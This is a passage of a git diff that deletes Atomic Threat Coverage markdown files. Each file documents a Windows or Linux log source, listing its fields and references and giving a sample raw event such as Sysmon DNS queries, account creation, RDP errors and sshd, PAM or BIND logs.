-| **References**     | <ul><li>[https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-22-dnsevent-dns-query](https://docs.microsoft.com/en-us/sysinternals/downloads/sysmon#event-id-22-dnsevent-dns-query)</li><li>[https://github.com/Cyb3rWard0g/OSSEM/blob/master/data_dictionaries/windows/sysmon/event-22.md](https://github.com/Cyb3rWard0g/OSSEM/blob/master/data_dictionaries/windows/sysmon/event-22.md)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Applications and Services Logs        |
-| **Channel**        | Microsoft-Windows-Sysmon/Operational     |
-| **Provider**       | Microsoft-Windows-Sysmon    |
-| **Fields**         | <ul><li>EventID</li><li>Computer</li><li>Hostname</li><li>UtcTime</li><li>RuleName</li><li>ProcessGuid</li><li>ProcessId</li><li>QueryName</li><li>QueryStatus</li><li>QueryResults</li><li>Image</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Sysmon" Guid="{5770385F-C22A-43E0-BF4C-06F5698FFBD9}" /> 
-    <EventID>22</EventID> 
-    <Version>5</Version> 
-    <Level>4</Level> 
-    <Task>22</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8000000000000000</Keywords> 
-    <TimeCreated SystemTime="2019-06-24T00:56:52.053368800Z" /> 
-    <EventRecordID>2637</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="5956" ThreadID="4672" /> 
-    <Channel>Microsoft-Windows-Sysmon/Operational</Channel> 
-    <Computer>atc-win-10.atc.local</Computer> 
-    <Security UserID="S-1-5-18" /> 
-  </System>
-  - <EventData>
-    <Data Name="RuleName" /> 
-    <Data Name="UtcTime">2019-06-24 00:56:50.125</Data> 
-    <Data Name="ProcessGuid">{717CFEC0-1A16-5D10-0000-0010CDEA1F00}</Data> 
-    <Data Name="ProcessId">3192</Data> 
-    <Data Name="QueryName">kibana.atomicthreatcoverage.com</Data> 
-    <Data Name="QueryStatus">0</Data> 
-    <Data Name="QueryResults">::ffff:157.230.126.111;</Data> 
-    <Data Name="Image">C:\Program Files (x86)\Google\Chrome\Application\chrome.exe</Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0086_4720_user_account_was_created.md b/Atomic_Threat_Coverage/Data_Needed/DN0086_4720_user_account_was_created.md
deleted file mode 100644
index 913dc5c..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0086_4720_user_account_was_created.md
+++ /dev/null
@@ -1,69 +0,0 @@
-| Title              | DN0086_4720_user_account_was_created       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | A user account was created |
-| **Logging Policy** | <ul><li>[LP0026_windows_audit_user_account_management](../Logging_Policies/LP0026_windows_audit_user_account_management.md)</li></ul> |
-| **References**     | <ul><li>[https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-4720.md](https://github.com/MicrosoftDocs/windows-itpro-docs/blob/master/windows/security/threat-protection/auditing/event-4720.md)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | Security     |
-| **Provider**       | Microsoft-Windows-Security-Auditing    |
-| **Fields**         | <ul><li>EventID</li><li>ComputerName</li><li>Computer</li><li>Hostname</li><li>TargetUserName</li><li>TargetDomainName</li><li>TargetSid</li><li>SubjectUserSid</li><li>SubjectUserName</li><li>SubjectDomainName</li><li>SubjectLogonId</li><li>PrivilegeList</li><li>SamAccountName</li><li>DisplayName</li><li>UserPrincipalName</li><li>HomeDirectory</li><li>HomePath</li><li>ScriptPath</li><li>ProfilePath</li><li>UserWorkstations</li><li>PasswordLastSet</li><li>AccountExpires</li><li>PrimaryGroupId</li><li>AllowedToDelegateTo</li><li>OldUacValue</li><li>NewUacValue</li><li>UserAccountControl</li><li>UserParameters</li><li>SidHistory</li><li>LogonHours</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" /> 
-    <EventID>4720</EventID> 
-    <Version>0</Version> 
-    <Level>0</Level> 
-    <Task>13824</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8020000000000000</Keywords> 
-    <TimeCreated SystemTime="2019-07-11T23:09:42.994762700Z" /> 
-    <EventRecordID>1346</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="532" ThreadID="564" /> 
-    <Channel>Security</Channel> 
-    <Computer>atc-win-2k12</Computer> 
-    <Security /> 
-  </System>
-  - <EventData>
-    <Data Name="TargetUserName">newuser</Data> 
-    <Data Name="TargetDomainName">ATC-WIN-2K12</Data> 
-    <Data Name="TargetSid">S-1-5-21-1566719857-3102892733-3273982148-1005</Data> 
-    <Data Name="SubjectUserSid">S-1-5-21-1566719857-3102892733-3273982148-1001</Data> 
-    <Data Name="SubjectUserName">yugoslavskiy</Data> 
-    <Data Name="SubjectDomainName">ATC-WIN-2K12</Data> 
-    <Data Name="SubjectLogonId">0x14c6b</Data> 
-    <Data Name="PrivilegeList">-</Data> 
-    <Data Name="SamAccountName">newuser</Data> 
-    <Data Name="DisplayName">%%1793</Data> 
-    <Data Name="UserPrincipalName">-</Data> 
-    <Data Name="HomeDirectory">%%1793</Data> 
-    <Data Name="HomePath">%%1793</Data> 
-    <Data Name="ScriptPath">%%1793</Data> 
-    <Data Name="ProfilePath">%%1793</Data> 
-    <Data Name="UserWorkstations">%%1793</Data> 
-    <Data Name="PasswordLastSet">%%1794</Data> 
-    <Data Name="AccountExpires">%%1794</Data> 
-    <Data Name="PrimaryGroupId">513</Data> 
-    <Data Name="AllowedToDelegateTo">-</Data> 
-    <Data Name="OldUacValue">0x0</Data> 
-    <Data Name="NewUacValue">0x15</Data> 
-    <Data Name="UserAccountControl">%%2080 %%2082 %%2084</Data> 
-    <Data Name="UserParameters">%%1793</Data> 
-    <Data Name="SidHistory">-</Data> 
-    <Data Name="LogonHours">%%1797</Data> 
-  </EventData>
-</Event>
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0087_5156_windows_filtering_platform_has_permitted_connection.md b/Atomic_Threat_Coverage/Data_Needed/DN0087_5156_windows_filtering_platform_has_permitted_connection.md
deleted file mode 100644
index f7518ff..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0087_5156_windows_filtering_platform_has_permitted_connection.md
+++ /dev/null
@@ -1,57 +0,0 @@
-| Title              | DN0087_5156_windows_filtering_platform_has_permitted_connection       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | The Windows Filtering Platform has permitted a connection |
-| **Logging Policy** | <ul><li>[LP0045_windows_audit_filtering_platform_connection](../Logging_Policies/LP0045_windows_audit_filtering_platform_connection.md)</li></ul> |
-| **References**     | <ul><li>[https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5156](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5156)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | Security     |
-| **Provider**       | Microsoft-Windows-Security-Auditing    |
-| **Fields**         | <ul><li>EventID</li><li>ComputerName</li><li>Computer</li><li>Hostname</li><li>ProcessID</li><li>Application</li><li>Direction</li><li>SourceAddress</li><li>SourcePort</li><li>DestAddress</li><li>DestPort</li><li>Protocol</li><li>FilterRTID</li><li>LayerName</li><li>LayerRTID</li><li>RemoteUserID</li><li>RemoteMachineID</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" /> 
-    <EventID>5156</EventID> 
-    <Version>1</Version> 
-    <Level>0</Level> 
-    <Task>12810</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8020000000000000</Keywords> 
-    <TimeCreated SystemTime="2019-07-11T23:32:31.307121600Z" /> 
-    <EventRecordID>1360</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="4" ThreadID="288" /> 
-    <Channel>Security</Channel> 
-    <Computer>atc-win-2k12</Computer> 
-    <Security /> 
-  </System>
-  - <EventData>
-    <Data Name="ProcessID">4</Data> 
-    <Data Name="Application">System</Data> 
-    <Data Name="Direction">%%14593</Data> 
-    <Data Name="SourceAddress">fe80::e8a5:2a62:cc49:96cb</Data> 
-    <Data Name="SourcePort">143</Data> 
-    <Data Name="DestAddress">ff02::16</Data> 
-    <Data Name="DestPort">0</Data> 
-    <Data Name="Protocol">58</Data> 
-    <Data Name="FilterRTID">67456</Data> 
-    <Data Name="LayerName">%%14611</Data> 
-    <Data Name="LayerRTID">50</Data> 
-    <Data Name="RemoteUserID">S-1-0-0</Data> 
-    <Data Name="RemoteMachineID">S-1-0-0</Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0088_4616_system_time_was_changed.md b/Atomic_Threat_Coverage/Data_Needed/DN0088_4616_system_time_was_changed.md
deleted file mode 100644
index 36c7af8..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0088_4616_system_time_was_changed.md
+++ /dev/null
@@ -1,52 +0,0 @@
-| Title              | DN0088_4616_system_time_was_changed       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | The system time was changed |
-| **Logging Policy** | <ul><li>[LP0046_windows_audit_security_state_change](../Logging_Policies/LP0046_windows_audit_security_state_change.md)</li></ul> |
-| **References**     | <ul><li>[https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4616](https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4616)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | Security     |
-| **Provider**       | Microsoft-Windows-Security-Auditing    |
-| **Fields**         | <ul><li>EventID</li><li>ComputerName</li><li>Computer</li><li>Hostname</li><li>SubjectUserSid</li><li>SubjectUserName</li><li>SubjectDomainName</li><li>SubjectLogonId</li><li>PreviousTime</li><li>NewTime</li><li>ProcessId</li><li>ProcessName</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="Microsoft-Windows-Security-Auditing" Guid="{54849625-5478-4994-A5BA-3E3B0328C30D}" /> 
-    <EventID>4616</EventID> 
-    <Version>1</Version> 
-    <Level>0</Level> 
-    <Task>12288</Task> 
-    <Opcode>0</Opcode> 
-    <Keywords>0x8020000000000000</Keywords> 
-    <TimeCreated SystemTime="2015-10-09T05:04:29.995794600Z" /> 
-    <EventRecordID>1101699</EventRecordID> 
-    <Correlation /> 
-    <Execution ProcessID="4" ThreadID="148" /> 
-    <Channel>Security</Channel> 
-    <Computer>DC01.contoso.local</Computer> 
-    <Security /> 
-  </System>
-  - <EventData>
-    <Data Name="SubjectUserSid">S-1-5-21-3457937927-2839227994-823803824-1104</Data> 
-    <Data Name="SubjectUserName">dadmin</Data> 
-    <Data Name="SubjectDomainName">CONTOSO</Data> 
-    <Data Name="SubjectLogonId">0x48f29</Data> 
-    <Data Name="PreviousTime">2015-10-09T05:04:30.000941900Z</Data> 
-    <Data Name="NewTime">2015-10-09T05:04:30.000000000Z</Data> 
-    <Data Name="ProcessId">0x1074</Data> 
-    <Data Name="ProcessName">C:\\Windows\\WinSxS\\amd64\_microsoft-windows-com-surrogate-core\_31bf3856ad364e35\_6.3.9600.16384\_none\_25a8f00faa8f185c\\dllhost.exe</Data> 
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0089_56_terminal_server_security_layer_detected_an_error.md b/Atomic_Threat_Coverage/Data_Needed/DN0089_56_terminal_server_security_layer_detected_an_error.md
deleted file mode 100644
index 4d55564..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0089_56_terminal_server_security_layer_detected_an_error.md
+++ /dev/null
@@ -1,42 +0,0 @@
-| Title              | DN0089_56_terminal_server_security_layer_detected_an_error       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | The Terminal Server security layer detected an error in the  protocol stream and has disconnected the client |
-| **Logging Policy** | <ul><li> Not existing </li></ul> |
-| **References**     | <ul><li>[http://www.eventid.net/display-eventid-56-source-TermDD-eventno-9421-phase-1.htm](http://www.eventid.net/display-eventid-56-source-TermDD-eventno-9421-phase-1.htm)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | System     |
-| **Provider**       | TermDD    |
-| **Fields**         | <ul><li>EventID</li><li>ComputerName</li><li>Computer</li><li>Hostname</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="TermDD" />
-    <EventID Qualifiers="49162">56</EventID>
-    <Level>2</Level>
-    <Task>0</Task>
-    <Keywords>0x80000000000000</Keywords>
-    <TimeCreated SystemTime="2019-07-11T22:26:42.723Z" />
-    <EventRecordID>147091</EventRecordID>
-    <Channel>System</Channel>
-    <Computer>atc-demo</Computer>
-    <Security />
-  </System>
-  - <EventData>
-    <Data>\Device\Termdd</Data>
-    <Binary>00050600010000000000000038000AC00000000039000AC00000000000000000000000000000000030030980</Binary>
-  </EventData>
-</Event>
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0090_50_terminal_server_security_layer_detected_an_error.md b/Atomic_Threat_Coverage/Data_Needed/DN0090_50_terminal_server_security_layer_detected_an_error.md
deleted file mode 100644
index 34ee7b8..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0090_50_terminal_server_security_layer_detected_an_error.md
+++ /dev/null
@@ -1,42 +0,0 @@
-| Title              | DN0090_50_terminal_server_security_layer_detected_an_error       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | The RDP protocol component <component> detected an error in the  protocol stream and has disconnected the client |
-| **Logging Policy** | <ul><li> Not existing </li></ul> |
-| **References**     | <ul><li>[http://www.eventid.net/display-eventid-50-source-TermDD-eventno-606-phase-1.htm](http://www.eventid.net/display-eventid-50-source-TermDD-eventno-606-phase-1.htm)</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Windows Log        |
-| **Channel**        | System     |
-| **Provider**       | TermDD    |
-| **Fields**         | <ul><li>EventID</li><li>ComputerName</li><li>Computer</li><li>Hostname</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-- <Event xmlns="http://schemas.microsoft.com/win/2004/08/events/event">
-  - <System>
-    <Provider Name="TermDD" /> 
-    <EventID Qualifiers="49162">50</EventID> 
-    <Level>2</Level> 
-    <Task>0</Task> 
-    <Keywords>0x80000000000000</Keywords> 
-    <TimeCreated SystemTime="2019-07-12T02:37:29.871133100Z" /> 
-    <EventRecordID>5483</EventRecordID> 
-    <Channel>System</Channel> 
-    <Computer>atc-win-7</Computer> 
-    <Security /> 
-  </System>
-  - <EventData>
-    <Data>\Device\Termdd</Data> 
-    <Data>X.224</Data> 
-    <Binary>00000B00020034000000000032000AC00000000032000AC0000000000000000000000000000000000B00000016030100C30100</Binary> 
-  </EventData>
-</Event>
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0091_linux_modsecurity_log.md b/Atomic_Threat_Coverage/Data_Needed/DN0091_linux_modsecurity_log.md
deleted file mode 100644
index 179dfce..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0091_linux_modsecurity_log.md
+++ /dev/null
@@ -1,25 +0,0 @@
-| Title              | DN0091_linux_modsecurity_log       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | Mod_security (Web Application Firewall) audit/error log |
-| **Logging Policy** | <ul><li> Not existing </li></ul> |
-| **References**     | <ul><li>[https://www.nginx.com/blog/modsecurity-logging-and-debugging/](https://www.nginx.com/blog/modsecurity-logging-and-debugging/)</li><li>[https://www.cryptobells.com/mod_security-json-audit-logs-revisited/](https://www.cryptobells.com/mod_security-json-audit-logs-revisited/)</li></ul> |
-| **Platform**       | Linux    |
-| **Type**           | modsecurity        |
-| **Channel**        | modsecurity     |
-| **Provider**       | modsecurity    |
-| **Fields**         | <ul><li>timestamp</li><li>hostname</li><li>client</li><li>uri</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-[Thu Jul 02 04:14:31 2018] [error] [client 190.222.135.100] mod_security: Access denied with code 500. Pattern match "SomePattern" at HEADER("USER-AGENT") [hostname "samplesite.com"] [uri "/some/uri"]
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0092_unix_generic_syslog.md b/Atomic_Threat_Coverage/Data_Needed/DN0092_unix_generic_syslog.md
deleted file mode 100644
index 7c856af..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0092_unix_generic_syslog.md
+++ /dev/null
@@ -1,25 +0,0 @@
-| Title              | DN0092_unix_generic_syslog       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | Unix generic syslog |
-| **Logging Policy** | <ul><li> Not existing </li></ul> |
-| **References**     | <ul><li>[https://github.com/Neo23x0/sigma/blob/master/rules/linux/lnx_buffer_overflows.yml](https://github.com/Neo23x0/sigma/blob/master/rules/linux/lnx_buffer_overflows.yml)</li></ul> |
-| **Platform**       | Unix    |
-| **Type**           | generic        |
-| **Channel**        | syslog     |
-| **Provider**       | syslog    |
-| **Fields**         | <ul><li>timestamp</li><li>uid</li><li>message</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-Nov 12 18:47:02 foo.bar.baz unix: rpc.ttdbserverd[1932] attempt to execute code on stack by uid 0
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0093_linux_clamav_log.md b/Atomic_Threat_Coverage/Data_Needed/DN0093_linux_clamav_log.md
deleted file mode 100644
index c3ca954..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0093_linux_clamav_log.md
+++ /dev/null
@@ -1,25 +0,0 @@
-| Title              | DN0093_linux_clamav_log       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | Linux ClamAV anti-virus logs |
-| **Logging Policy** | <ul><li> Not existing </li></ul> |
-| **References**     | <ul><li>[https://www.clamav.net](https://www.clamav.net)</li><li>[https://docs.pivotal.io/addon-antivirus/1-4/monitoring-logs.html](https://docs.pivotal.io/addon-antivirus/1-4/monitoring-logs.html)</li><li>[https://github.com/ossec/ossec-hids/blob/master/etc/rules/clam_av_rules.xml](https://github.com/ossec/ossec-hids/blob/master/etc/rules/clam_av_rules.xml)</li></ul> |
-| **Platform**       | Linux    |
-| **Type**           | None        |
-| **Channel**        | ClamAV     |
-| **Provider**       | ClamAV    |
-| **Fields**         | <ul><li>Hostname</li><li>Signature</li><li>FileName</li><li>FilePath</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-/var/vcap/data/test.txt: Eicar-Test-Signature FOUND
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0094_linux_sshd_log.md b/Atomic_Threat_Coverage/Data_Needed/DN0094_linux_sshd_log.md
deleted file mode 100644
index 921b280..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0094_linux_sshd_log.md
+++ /dev/null
@@ -1,25 +0,0 @@
-| Title              | DN0094_linux_sshd_log       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | OpenSSH SSH daemon (sshd) log |
-| **Logging Policy** | <ul><li> Not existing </li></ul> |
-| **References**     | <ul><li>[https://en.wikibooks.org/wiki/OpenSSH/Logging_and_Troubleshooting](https://en.wikibooks.org/wiki/OpenSSH/Logging_and_Troubleshooting)</li></ul> |
-| **Platform**       | Linux    |
-| **Type**           | auth        |
-| **Channel**        | auth.log     |
-| **Provider**       | sshd    |
-| **Fields**         | <ul><li>Hostname</li><li>UserName</li><li>Daemon</li><li>Program</li><li>Message</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-May 18 16:41:20 hostname sshd[890]: error: buffer_get_string_ret: buffer_get failed
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0095_linux_auth_pam_log.md b/Atomic_Threat_Coverage/Data_Needed/DN0095_linux_auth_pam_log.md
deleted file mode 100644
index 0d58218..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0095_linux_auth_pam_log.md
+++ /dev/null
@@ -1,25 +0,0 @@
-| Title              | DN0095_linux_auth_pam_log       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | Linux Pluggable Authentication Modules (PAM) authentication log |
-| **Logging Policy** | <ul><li> Not existing </li></ul> |
-| **References**     | <ul><li>[http://manpages.ubuntu.com/manpages/trusty/en/man7/pam.7.html](http://manpages.ubuntu.com/manpages/trusty/en/man7/pam.7.html)</li></ul> |
-| **Platform**       | Linux    |
-| **Type**           | auth        |
-| **Channel**        | auth.log     |
-| **Provider**       | pam    |
-| **Fields**         | <ul><li>Hostname</li><li>UserName</li><li>Daemon</li><li>Message</li><li>pam_service</li><li>pam_user</li><li>pam_unix</li><li>pam_tty</li><li>pam_ruser</li><li>pam_rhost</li><li>pam_type</li><li>pam_authtok</li><li>pam_message</li><li>uid</li><li>logname</li><li>uid</li><li>euid</li><li>tty</li><li>ruser</li><li>rhost</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-May 18 16:41:20 hostname service: (pam_unix) authentication failure; logname= uid=33 euid=33 tty= ruser= rhost= user=root
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0096_linux_named_client_security_log.md b/Atomic_Threat_Coverage/Data_Needed/DN0096_linux_named_client_security_log.md
deleted file mode 100644
index 49900b2..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0096_linux_named_client_security_log.md
+++ /dev/null
@@ -1,25 +0,0 @@
-| Title              | DN0096_linux_named_client_security_log       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | Linux named (BIND) messages relating to client access and security |
-| **Logging Policy** | <ul><li>[LP0034_linux_named_client_security_log](../Logging_Policies/LP0034_linux_named_client_security_log.md)</li></ul> |
-| **References**     | <ul><li>[https://kb.isc.org/docs/aa-01526](https://kb.isc.org/docs/aa-01526)</li><li>[http://jhurani.com/linux/2013/02/12/named-disable-xfer.html](http://jhurani.com/linux/2013/02/12/named-disable-xfer.html)</li></ul> |
-| **Platform**       | Linux    |
-| **Type**           | client_security_log        |
-| **Channel**        | client_security_log     |
-| **Provider**       | named    |
-| **Fields**         | <ul><li>Hostname</li><li>ClientIP</li><li>ClientPort</li><li>ZoneTransferDomain</li><li>Message</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-28-Aug-2019 02:03:13.739 security: error: client 192.168.0.2#53274 (atc.local): zone transfer 'atc.local/AXFR/IN' denied
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0097_linux_daemon_log.md b/Atomic_Threat_Coverage/Data_Needed/DN0097_linux_daemon_log.md
deleted file mode 100644
index 60294c4..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0097_linux_daemon_log.md
+++ /dev/null
@@ -1,25 +0,0 @@
-| Title              | DN0097_linux_daemon_log       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | The daemons log at /var/log/daemon.log and contains information about running  system and application daemons |
-| **Logging Policy** | <ul><li> Not existing </li></ul> |
-| **References**     | <ul><li>[https://help.ubuntu.com/community/LinuxLogFiles](https://help.ubuntu.com/community/LinuxLogFiles)</li></ul> |
-| **Platform**       | Linux    |
-| **Type**           | daemon        |
-| **Channel**        | daemon.log     |
-| **Provider**       | many    |
-| **Fields**         | <ul><li>Hostname</li><li>Daemon</li><li>Program</li><li>Message</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-Aug 28 23:39:09 debian-9-x64-atc named[32010]: exiting (due to fatal error)
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0098_linux_vsftpd_log.md b/Atomic_Threat_Coverage/Data_Needed/DN0098_linux_vsftpd_log.md
deleted file mode 100644
index 77c3546..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0098_linux_vsftpd_log.md
+++ /dev/null
@@ -1,25 +0,0 @@
-| Title              | DN0098_linux_vsftpd_log       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | vsftpd (FTP server) log |
-| **Logging Policy** | <ul><li> Not existing </li></ul> |
-| **References**     | <ul><li>[https://en.wikipedia.org/wiki/Vsftpd](https://en.wikipedia.org/wiki/Vsftpd)</li><li>[https://security.appspot.com/vsftpd.html](https://security.appspot.com/vsftpd.html)</li></ul> |
-| **Platform**       | Linux    |
-| **Type**           | vsftpd.log        |
-| **Channel**        | vsftpd.log     |
-| **Provider**       | vsftpd    |
-| **Fields**         | <ul><li>Hostname</li><li>Daemon</li><li>Program</li><li>ClientIP</li><li>PID</li><li>Message</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-Sat Jun  2 11:20:19 2018 [pid 3616] CONNECT: Client "ip", "Connection refused: too many sessions for this address."
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0099_Bind_DNS_query.md b/Atomic_Threat_Coverage/Data_Needed/DN0099_Bind_DNS_query.md
deleted file mode 100644
index be6d3b3..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0099_Bind_DNS_query.md
+++ /dev/null
@@ -1,25 +0,0 @@
-| Title              | DN0099_Bind_DNS_query       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | DNS Query from BIND Server |
-| **Logging Policy** | <ul><li>[LP0047_BIND_DNS_queries](../Logging_Policies/LP0047_BIND_DNS_queries.md)</li></ul> |
-| **References**     | <ul><li>[None](None)</li></ul> |
-| **Platform**       | Linux    |
-| **Type**           | queries log        |
-| **Channel**        | queries_log     |
-| **Provider**       | BIND    |
-| **Fields**         | <ul><li>date</li><li>record_type</li><li>client_ip</li><li>src_ip</li><li>domain_name</li><li>query</li><li>dns_query</li><li>destination_ip</li><li>dst_ip</li><li>parent_domain</li><li>question_length</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-25-Oct-2019 01:22:19.421 queries: info: client 192.168.1.200#51364 (yahoo.com): query: yahoo.com IN TXT + (192.168.1.235)
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0100_Passive_DNS_log.md b/Atomic_Threat_Coverage/Data_Needed/DN0100_Passive_DNS_log.md
deleted file mode 100644
index 8a7fcf9..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0100_Passive_DNS_log.md
+++ /dev/null
@@ -1,25 +0,0 @@
-| Title              | DN0100_Passive_DNS_log       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | Log from Passive DNS |
-| **Logging Policy** | <ul><li>[LP0048_Passive_DNS_logging](../Logging_Policies/LP0048_Passive_DNS_logging.md)</li></ul> |
-| **References**     | <ul><li>[None](None)</li></ul> |
-| **Platform**       | Linux    |
-| **Type**           | queries log        |
-| **Channel**        | passivedns     |
-| **Provider**       | Passive DNS    |
-| **Fields**         | <ul><li>date</li><li>record_type</li><li>client_ip</li><li>src_ip</li><li>destination_ip</li><li>dst_ip</li><li>ttl</li><li>domain_name</li><li>query</li><li>dns_query</li><li>answer</li><li>parent_domain</li><li>question_length</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-1523230478.705932||192.168.1.235||8.8.8.8||IN||facebook.com.||TXT||"v=spf1 redirect=_spf.facebook.com"||21323||1
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Data_Needed/DN0108_150_dns_server_could_not_load_dll.md b/Atomic_Threat_Coverage/Data_Needed/DN0108_150_dns_server_could_not_load_dll.md
deleted file mode 100644
index 4b415f7..0000000
--- a/Atomic_Threat_Coverage/Data_Needed/DN0108_150_dns_server_could_not_load_dll.md
+++ /dev/null
@@ -1,25 +0,0 @@
-| Title              | DN0036_150_dns_server_could_not_load_dll       |
-|:-------------------|:------------------|
-| **Author**         | @atc_project        |
-| **Description**    | Windows DNS server could not load or initialize the plug-in DLL |
-| **Logging Policy** | <ul><li> Not existing </li></ul> |
-| **References**     | <ul><li>[https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc735829(v=ws.10)](https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-R2-and-2008/cc735829(v=ws.10))</li></ul> |
-| **Platform**       | Windows    |
-| **Type**           | Applications and Services Logs        |
-| **Channel**        | DNS Server     |
-| **Provider**       | Microsoft-Windows-DNS-Server-Service    |
-| **Fields**         | <ul><li>EventID</li><li>Hostname</li><li>Computer</li></ul> |
-
-
-## Log Samples
-
-### Raw Log
-
-```
-todo
-
-```
-
-
-
-
diff --git a/Atomic_Threat_Coverage/Detection_Rules/av_exploiting.md b/Atomic_Threat_Coverage/Detection_Rules/av_exploiting.md
deleted file mode 100644
index fb6f7be..0000000
--- a/Atomic_Threat_Coverage/Detection_Rules/av_exploiting.md
+++ /dev/null
@@ -1,187 +0,0 @@
-| Title                    | Antivirus Exploitation Framework Detection       |
-|:-------------------------|:------------------|
